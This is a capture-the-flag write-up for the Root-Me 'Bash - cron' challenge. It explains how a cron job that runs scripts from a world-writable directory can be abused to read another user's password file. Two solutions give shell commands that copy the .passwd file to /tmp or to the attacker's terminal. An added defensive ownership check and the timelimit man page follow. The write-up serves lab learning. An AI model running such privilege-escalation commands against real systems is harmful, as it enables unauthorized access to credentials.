LINK:https://www.root-me.org/en/Challenges/App-Script/Bash-cron
After logging in to the host, display the contents of the ch4 shell script:

    app-script-ch4@challenge02:~$ cat ch4
    #!/bin/bash

    # Sortie de la commande 'crontab -l' exécutée en tant que app-script-ch4-cracked:
    # */1 * * * * /challenge/app-script/ch4/ch4
    # (writeup note) The crontab of user app-script-ch4-cracked runs the script /challenge/app-script/ch4/ch4 once every minute.
    # Vous N'avez PAS à modifier la crontab(chattr +i t'façons)

    # Output of the command 'crontab -l' run as app-script-ch4-cracked:
    # */1 * * * * /challenge/app-script/ch4/ch4
    # You do NOT need to edit the crontab (it's chattr +i anyway)

    # hiding stdout/stderr
    exec 1>/dev/null 2>&1

    wdir="cron.d/"
    challdir=${0%/*}
    cd "$challdir"

    if [ ! -e "/tmp/._cron" ]; then
        mkdir -m 733 "/tmp/._cron"
    fi

    ls -1a "${wdir}" | while read task; do
        if [ -f "${wdir}${task}" -a -x "${wdir}${task}" ]; then
            timelimit -q -s9 -S9 -t 5 bash -p "${PWD}/${wdir}${task}"
            # (writeup note) I don't fully understand the timelimit command, but roughly it runs bash -p cron.d/<some script> within a fixed time interval.
        fi
        rm -f "${PWD}/${wdir}${task}"
    done

    rm -rf cron.d/*
    # (writeup note) The files in this directory are cleaned up every minute.

To solve this challenge, a script has to be created in that directory. The script may be deleted before I have finished the necessary steps, so the solution has to be completed within one minute.

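Solution 1: Write the password to a file.

    app-script-ch4@challenge02:~$ vi cron.d/1.sh
    #!/bin/bash
    if [ ! -e "/tmp/ch4" ]; then
        mkdir -m 777 "/tmp/ch4"
    fi
    /bin/cat /challenge/app-script/ch4/.passwd > /tmp/ch4/result.txt
    app-script-ch4@challenge02:~$ chmod o+rx cron.d/1.sh

The chmod makes the script readable and executable by other users, because it has to run from the cron job of user app-script-ch4-cracked. The script may be deleted right after it is created, in which case it has to be created again. After these two steps, wait no more than one minute and /tmp/ch4/result.txt is generated, containing the password.
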
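Solution 2: Print the password on the terminal of the SSH session.

Find the terminal device used by the current SSH connection:

    app-script-ch4@challenge02:~$ set |grep "/dev/pts" |awk -F '=' '{print $2}'
    /dev/pts/20

Grant write permission on the current terminal to other users, i.e. to app-script-ch4-cracked:

    app-script-ch4@challenge02:~$ chmod o+w /dev/pts/20

Create the script and make it readable and executable by other users:

    app-script-ch4@challenge02:~$ vi cron.d/1.sh
    #!/bin/bash
    /bin/cat /challenge/app-script/ch4/.passwd > /dev/pts/20
    app-script-ch4@challenge02:~$ chmod o+rx cron.d/1.sh

In less than a minute the result is printed on the current terminal.
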
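Both solutions succeed because the cron job executes, as app-script-ch4-cracked, any executable file found in a directory that another user can write to. The following is an added example, not part of the challenge or of the original writeup: an ownership and permission gate that such a job could apply before running a task. The function names are hypothetical and it assumes GNU coreutils `stat -c`.

```bash
#!/bin/bash
# Added example, not the challenge's script. Assumes GNU coreutils `stat -c`.
# All function names are hypothetical.

# 0 if path $1 is owned by uid $2 and has no group/other write bit.
owned_and_not_shared() {
    local path="$1" want_uid="$2" uid mode
    uid=$(stat -c '%u' -- "$path") || return 1
    mode=$(stat -c '%a' -- "$path") || return 1
    [ "$uid" = "$want_uid" ] || return 1
    # 022 (octal) masks the group-write and other-write bits.
    [ $(( 0$mode & 022 )) -eq 0 ]
}

# 0 if $1 is a regular, executable, non-symlink file that passes the check above.
is_trusted_task() {
    local path="$1" want_uid="$2"
    [ ! -L "$path" ] && [ -f "$path" ] && [ -x "$path" ] || return 1
    owned_and_not_shared "$path" "$want_uid"
}

# Print the names of the tasks in directory $1 that a job running as uid $2
# may execute. Returns 1 and lists nothing if the directory itself is
# untrusted (wrong owner, or writable by group/others as in the challenge).
list_runnable_tasks() {
    local dir="${1%/}" want_uid="$2" task
    [ -d "$dir" ] && [ ! -L "$dir" ] || return 1
    owned_and_not_shared "$dir" "$want_uid" || return 1
    for task in "$dir"/*; do
        if is_trusted_task "$task" "$want_uid"; then
            printf '%s\n' "${task##*/}"
        fi
    done
    return 0
}
```

A task dropped by a different user fails the owner comparison even when the directory check is skipped, so the two checks back each other up.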
Appendix: (timelimit man page)

TIMELIMIT(1)              BSD General Commands Manual             TIMELIMIT(1)

NAME
     timelimit -- effectively limit the absolute execution time of a process

SYNOPSIS
     timelimit [-pq] [-S killsig] [-s warnsig] [-T killtime] [-t warntime]
               command [arguments ...]

DESCRIPTION
     The timelimit utility executes a given command with the supplied
     arguments and terminates the spawned process after a given time with a
     given signal. If the process exits before the time limit has elapsed,
     timelimit will silently exit, too.

     Options:

     -p      If the child process is terminated by a signal, timelimit
             propagates this condition, i.e. sends the same signal to itself.
             This allows the program executing timelimit to determine whether
             the child process was terminated by a signal or actually exited
             with an exit code larger than 128.

     -q      Quiet operation - timelimit does not output diagnostic messages
             about signals sent to the child process.

     -S killsig
             Specify the number of the signal to be sent to the process
             killtime seconds after warntime has expired. Defaults to 9
             (SIGKILL).

     -s warnsig
             Specify the number of the signal to be sent to the process
             warntime seconds after it has been started. Defaults to 15
             (SIGTERM).

     -T killtime
             Specify the maximum execution time of the process before sending
             killsig after warnsig has been sent. Defaults to 120 seconds.

     -t warntime
             Specify the maximum execution time of the process in seconds
             before sending warnsig. Defaults to 3600 seconds.

     On systems that support the setitimer(2) system call, the warntime and
     killtime values may be specified in fractional seconds with microsecond
     precision.

ENVIRONMENT
     KILLSIG   The killsig to use if the -S option was not specified.

     KILLTIME  The killtime to use if the -T option was not specified.

     WARNSIG   The warnsig to use if the -s option was not specified.

     WARNTIME  The warntime to use if the -t option was not specified.

EXIT STATUS
     If the child process exits normally, the timelimit utility will pass its
     exit code on up.

     If the child process is terminated by a signal and the -p flag was not
     specified, the timelimit utility's exit status is 128 plus the signal
     number, similar to sh(1). If the -p flag was specified, the timelimit
     utility will raise the signal itself so that its own parent process may
     in turn reliably distinguish between a signal and a larger than 128 exit
     code.

     In rare cases, the timelimit utility may encounter a system or user
     error; then, its exit status is one of the standard sysexits(3) values:

     EX_USAGE     The command-line parameters and options were incorrectly
                  specified.

     EX_SOFTWARE  The timelimit utility itself received an unexpected signal
                  while waiting for the child process to terminate.

     EX_OSERR     The timelimit utility was unable to execute the child
                  process, wait for it to terminate, or examine its exit
                  status.

EXAMPLES
     The following examples are shown as given to the shell:

           timelimit -p /usr/local/bin/rsync rsync://some.host/dir /opt/mirror

     Run the rsync program to mirror a WWW or FTP site and kill it if it runs
     longer than 1 hour (that is 3600 seconds) with SIGTERM. If the rsync
     process does not exit after receiving the SIGTERM, timelimit issues a
     SIGKILL 120 seconds after the SIGTERM. If the rsync process is
     terminated by a signal, timelimit will itself raise this signal.

           tcpserver 0 8888 timelimit -t600 -T300 /opt/services/chat/stats

     Start a tcpserver(n) process listening on tcp port 8888; each client
     connection shall invoke an instance of an IRC statistics tool under
     /opt/services/chat and kill it after 600 seconds have elapsed. If the
     stats process is still running after the SIGTERM, it will be killed by a
     SIGKILL sent 300 seconds later.

           env WARNTIME=4.99 WARNSIG=1 KILLTIME=1.000001 timelimit sh stats.sh

     Start a shell script and kill it with a SIGHUP in a little under 5
     seconds. If the shell gets stuck and does not respond to the SIGHUP,
     kill it with the default SIGKILL just a bit over a second afterwards.

SEE ALSO
     kill(1), rsync(1), signal(3), tcpserver(n)

STANDARDS
     No standards documentation was harmed in the process of creating
     timelimit.

BUGS
     Please report any bugs in timelimit to the author.

AUTHOR
     The timelimit utility was conceived and written by Peter Pentchev with
     contributions and suggestions by Karsten W Rohrbach, Teddy Hogeborn, and
     Tomasz Nowak.